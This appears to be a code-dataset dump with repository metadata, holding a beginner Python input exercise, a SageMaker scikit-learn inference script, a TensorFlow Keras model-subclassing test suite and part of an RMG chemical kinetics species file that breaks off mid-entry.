"[email protected]"
] | |
8706dd9534d6b4516529a80ef067267221875e06 | aca65ed6f3c7e347adb9923fa78da77497624930 | /ex11.py | 03b2cc71ce6a496f5d1cdcbe77ee9e375f4c850b | [] | no_license | bunnybryna/Learn_Python_The_Hard_Way | 516bb76ced2569ea27d9ce50c5d5bc00eeb5740d | c4aeece3b819a228acb2fb77f29551a8683331c4 | refs/heads/master | 2021-01-11T18:04:41.477498 | 2017-01-23T17:42:28 | 2017-01-23T17:42:28 | 79,486,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | print "How old are you? (year)",
age = raw_input()
print "How tall are you? (centimeter)",
height = raw_input()
print "How much do you weigh? (kilogram)",
weight = raw_input()
print "So ,you're %s years old, %s centimeters tall and %s kilograms heavy." % (
age, height, weight)
| [
"[email protected]"
] | |
79fecc2c9c41f461be00ccb461bdb9cef9e811f3 | 6bb45c5892b4c9692dcc44116fb73dc9e7ab90ff | /advanced_functionality/scikit_learn_bring_your_own_model/code/inference.py | 586143a9c2d8e619fe940d1c6006ddefc83d208a | [
"Apache-2.0",
"BSD-2-Clause"
] | permissive | aws/amazon-sagemaker-examples | 8359afe544e873662bda5b8d2b07399c437213c9 | 43dae4b28531cde167598f104f582168b0a4141f | refs/heads/main | 2023-08-26T04:42:52.342776 | 2023-08-25T14:37:19 | 2023-08-25T14:37:19 | 107,937,815 | 4,797 | 3,519 | Apache-2.0 | 2023-09-14T19:47:03 | 2017-10-23T05:55:22 | Jupyter Notebook | UTF-8 | Python | false | false | 487 | py | import os
import joblib
def predict_fn(input_object, model):
###########################################
# Do your custom preprocessing logic here #
###########################################
print("calling model")
predictions = model.predict(input_object)
return predictions
def model_fn(model_dir):
print("loading model.joblib from: {}".format(model_dir))
loaded_model = joblib.load(os.path.join(model_dir, "model.joblib"))
return loaded_model
| [
"[email protected]"
] | |
fdd337731c2630cb780993a60ce66945c2781153 | 17554c4666f40759074dbe204aca6f9b5373d207 | /tensorflow/python/keras/_impl/keras/model_subclassing_test.py | 3d71a620fcb34d21c41f920eed99b1fe22668899 | [
"Apache-2.0"
] | permissive | PACELab/tensorflow-1 | ef92f70c5e5ff4cb3bda9254b8ef66b45f124566 | fff95ee576e266eae9ccf23688849303aa146a3d | refs/heads/master | 2021-01-25T14:34:10.574775 | 2018-03-03T18:14:50 | 2018-03-03T18:14:50 | 123,713,012 | 0 | 1 | Apache-2.0 | 2018-03-03T17:03:35 | 2018-03-03T17:03:35 | null | UTF-8 | Python | false | false | 20,297 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Model subclassing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class SimpleTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=10):
super(SimpleTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='softmax')
if self.use_dp:
self.dp = keras.layers.Dropout(0.5)
if self.use_bn:
self.bn = keras.layers.BatchNormalization(axis=-1)
def call(self, inputs):
x = self.dense1(inputs)
if self.use_dp:
x = self.dp(x)
if self.use_bn:
x = self.bn(x)
return self.dense2(x)
class MultiIOTestModel(keras.Model):
def __init__(self, use_bn=False, use_dp=False, num_classes=(2, 3)):
super(MultiIOTestModel, self).__init__(name='test_model')
self.use_bn = use_bn
self.use_dp = use_dp
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes[0], activation='softmax')
self.dense3 = keras.layers.Dense(num_classes[1], activation='softmax')
if use_dp:
self.dp = keras.layers.Dropout(0.5)
if use_bn:
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x1, x2 = inputs
x1 = self.dense1(x1)
x2 = self.dense1(x2)
if self.use_dp:
x1 = self.dp(x1)
if self.use_bn:
x2 = self.bn(x2)
return [self.dense2(x1), self.dense3(x2)]
class NestedTestModel1(keras.Model):
"""A model subclass nested inside a model subclass.
"""
def __init__(self, num_classes=2):
super(NestedTestModel1, self).__init__(name='nested_model_1')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = keras.layers.BatchNormalization()
self.test_net = SimpleTestModel(num_classes=4,
use_bn=True,
use_dp=True)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x) # pylint: disable=not-callable
return self.dense2(x)
def get_functional_graph_model(input_dim, num_classes):
# A simple functional-API model (a.k.a. graph network)
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs)
class NestedTestModel2(keras.Model):
"""A model subclass with a functional-API graph network inside.
"""
def __init__(self, num_classes=2):
super(NestedTestModel2, self).__init__(name='nested_model_2')
self.num_classes = num_classes
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(num_classes, activation='relu')
self.bn = self.bn = keras.layers.BatchNormalization()
self.test_net = get_functional_graph_model(32, 4)
def call(self, inputs):
x = self.dense1(inputs)
x = self.bn(x)
x = self.test_net(x)
return self.dense2(x)
def get_nested_model_3(input_dim, num_classes):
# A functional-API model with a subclassed model inside.
# NOTE: this requires the inner subclass to implement `compute_output_shape`.
inputs = keras.Input(shape=(input_dim,))
x = keras.layers.Dense(32, activation='relu')(inputs)
x = keras.layers.BatchNormalization()(x)
class Inner(keras.Model):
def __init__(self):
super(Inner, self).__init__()
self.dense1 = keras.layers.Dense(32, activation='relu')
self.dense2 = keras.layers.Dense(5, activation='relu')
self.bn = keras.layers.BatchNormalization()
def call(self, inputs):
x = self.dense1(inputs)
x = self.dense2(x)
return self.bn(x)
def compute_output_shape(self, input_shape):
return tensor_shape.TensorShape((input_shape[0], 5))
test_model = Inner()
x = test_model(x) # pylint: disable=not-callable
outputs = keras.layers.Dense(num_classes)(x)
return keras.Model(inputs, outputs, name='nested_model_3')
class ModelSubclassingTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def test_single_io_workflow_with_np_arrays(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
@test_util.run_in_graph_and_eager_modes()
def test_multi_io_workflow_with_np_arrays(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
def test_single_io_workflow_with_tensors(self):
num_classes = 2
num_samples = 10
input_dim = 50
with self.test_session():
model = SimpleTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x = array_ops.ones((num_samples, input_dim))
y = array_ops.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_tensors(self):
num_classes = (2, 3)
num_samples = 10
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = array_ops.ones((num_samples, input_dim))
x2 = array_ops.ones((num_samples, input_dim))
y1 = array_ops.zeros((num_samples, num_classes[0]))
y2 = array_ops.zeros((num_samples, num_classes[1]))
model.fit([x1, x2], [y1, y2], epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_numpy_arrays_and_custom_placeholders(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
x2_placeholder = array_ops.placeholder(
dtype='float32', shape=(None, input_dim))
model._set_inputs([x1, x2_placeholder])
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_attributes(self):
# layers, weights, trainable_weights, non_trainable_weights, inputs, outputs
num_classes = (2, 3)
num_samples = 100
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
self.assertEqual(model.name, 'test_model')
self.assertEqual(model.built, False)
self.assertEqual(len(model.weights), 0)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
self.assertEqual(model.built, True)
self.assertEqual(len(model.layers), 4)
self.assertEqual(len(model.weights), 10)
self.assertEqual(len(model.trainable_weights), 8)
self.assertEqual(len(model.non_trainable_weights), 2)
self.assertEqual(len(model.inputs), 2)
self.assertEqual(len(model.outputs), 2)
@test_util.run_in_graph_and_eager_modes()
def test_updates(self):
# test that updates get run during training
num_samples = 100
input_dim = 50
class BNNet(keras.Model):
def __init__(self):
super(BNNet, self).__init__()
self.bn = keras.layers.BatchNormalization(beta_initializer='ones',
gamma_initializer='ones')
def call(self, inputs):
return self.bn(inputs)
x = np.ones((num_samples, input_dim))
y = np.ones((num_samples, input_dim))
with self.test_session():
model = BNNet()
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
y_ref = model.predict(x)
model.train_on_batch(x, y)
y_new = model.predict(x)
self.assertGreater(np.sum(np.abs(y_ref - y_new)), 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_and_inference_behavior(self):
# test that dropout is applied in training and not inference
num_samples = 100
input_dim = 50
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs):
x = self.dp(inputs)
return self.dense(x)
with self.test_session():
model = DPNet()
x = np.ones((num_samples, input_dim))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_methods(self):
# test fit, train_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
model.fit({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2},
epochs=2, batch_size=32)
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0,
validation_data=([x1, x2], [y1, y2]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
model.train_on_batch({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2})
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_inference_methods(self):
# test predict, evaluate, test_on_batch, predict_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.evaluate([x1, x2], [y1, y2])
model.test_on_batch([x1, x2], [y1, y2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict([x1, x2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict_on_batch([x1, x2])
@test_util.run_in_graph_and_eager_modes()
def test_trainable_mutation(self):
# test that you can change `trainable` on a model or layer, and that
# it freezes the model state during training
# TODO(fchollet): add test after we unify BN behavior in eager and symbolic.
pass
@test_util.run_in_graph_and_eager_modes()
def test_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
y_ref_1, y_ref_2 = model.predict([x1, x2])
fd, fname = tempfile.mkstemp('.h5')
model.save_weights(fname)
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
# need to build the model before loading weights
# (otherwise no weights to load)
model._set_inputs([x1, x2])
model.load_weights(fname)
y1, y2 = model.predict([x1, x2])
self.assertAllClose(y_ref_1, y1, atol=1e-5)
self.assertAllClose(y_ref_2, y2, atol=1e-5)
os.close(fd)
os.remove(fname)
@test_util.run_in_graph_and_eager_modes()
def test_summary(self):
class ToString(object):
def __init__(self):
self.contents = ''
def __call__(self, msg):
self.contents += msg + '\n'
# Single-io
model = SimpleTestModel(num_classes=4, use_bn=True, use_dp=True)
model._set_inputs(np.ones((3, 4))) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 356' in print_fn.contents)
# Multi-io
model = MultiIOTestModel(num_classes=(5, 6), use_bn=True, use_dp=True)
model._set_inputs([np.ones((3, 4)),
np.ones((3, 4))]) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 587' in print_fn.contents)
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = NestedTestModel1(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_graph_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = NestedTestModel2(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_graph(self):
num_classes = 2
num_samples = 100
input_dim = 50
with self.test_session():
model = get_nested_model_3(input_dim=input_dim, num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 16)
self.assertEqual(
len(model.non_trainable_weights), 4)
self.assertEqual(len(model.trainable_weights), 12)
@test_util.run_in_graph_and_eager_modes()
def test_support_for_manual_training_arg(self):
# In most cases, the `training` argument is left unspecified, in which
# case it defaults to value corresponding to the Model method being used
# (fit -> True, predict -> False, etc).
# If the user writes their model `call` method to take
# an explicit `training` argument, we must check that the correct value
# is being passed to the model for each method call.
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs, training=False):
x = self.dp(inputs, training=training)
return self.dense(x)
with self.test_session():
model = DPNet()
x = np.ones((10, 10))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
6975e4ae224d2fc47695bcd05ebae6980ef10880 | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network1235_1.py | c8099e96137017a0b095a2519e6f5c6d3a2fd58a | [] | no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72,209 | py | species(
label = 'C[CH]OC[C]([O])OO(3631)',
structure = SMILES('C[CH]OC[C]([O])OO'),
E0 = (49.4811,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.23632,0.104008,-0.0001702,1.52915e-07,-5.38939e-11,6093.3,33.8084], Tmin=(100,'K'), Tmax=(825.111,'K')), NASAPolynomial(coeffs=[8.87216,0.0407704,-2.05512e-05,3.97673e-09,-2.75397e-13,5239.71,-4.44785], Tmin=(825.111,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.4811,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = '[CH2]C(=O)OO(1167)',
structure = SMILES('[CH2]C(=O)OO'),
E0 = (-234.165,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,631.199,631.199,631.199,631.2],'cm^-1')),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5852,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5853,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5853,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (75.0434,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3635.24,'J/mol'), sigma=(5.76225,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=567.82 K, Pc=43.11 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.3608,0.0242042,1.63595e-05,-4.45473e-08,2.01814e-11,-28093.7,18.81], Tmin=(100,'K'), Tmax=(954.621,'K')), NASAPolynomial(coeffs=[13.6646,0.00626349,-1.68383e-06,3.41178e-10,-2.97857e-14,-31592.6,-42.2214], Tmin=(954.621,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-234.165,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(170.447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-(Cds-O2d)HHH) + group(Cds-OdCsOs) + radical(CJCO)"""),
)
species(
label = 'CC=O(606)',
structure = SMILES('CC=O'),
E0 = (-177.906,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1427.17,1427.17,1427.17,1427.17,3755.47],'cm^-1')),
HinderedRotor(inertia=(0.717734,'amu*angstrom^2'), symmetry=1, barrier=(16.5021,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (44.0526,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3625.12,'J/mol'), sigma=(3.97,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.70079,0.000387835,3.86929e-05,-4.52447e-08,1.58859e-11,-21380.9,9.13562], Tmin=(100,'K'), Tmax=(984.198,'K')), NASAPolynomial(coeffs=[4.58889,0.0128894,-4.91502e-06,9.26508e-10,-6.71011e-14,-22336,0.901072], Tmin=(984.198,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-177.906,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)HHH) + group(Cds-OdCsH)"""),
)
species(
label = 'C[CH]O[CH]C(=O)OO(3928)',
structure = SMILES('C[CH]O[CH]C(=O)OO'),
E0 = (-246.897,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3050,390,425,1340,1360,335,370,3615,1310,387.5,850,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,933.333,1066.67,1200,1333.33,1466.67,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.766237,0.0899202,-9.58537e-05,4.86986e-08,-9.41707e-12,-29510.6,32.7391], Tmin=(100,'K'), Tmax=(1340.96,'K')), NASAPolynomial(coeffs=[24.4205,0.0109432,-3.20725e-06,4.99769e-10,-3.2386e-14,-35919.6,-94.8724], Tmin=(1340.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-246.897,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs) + radical(CCsJOCs)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C=COC[C]([O])OO(1305)',
structure = SMILES('C=COC[C]([O])OO'),
E0 = (-43.109,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
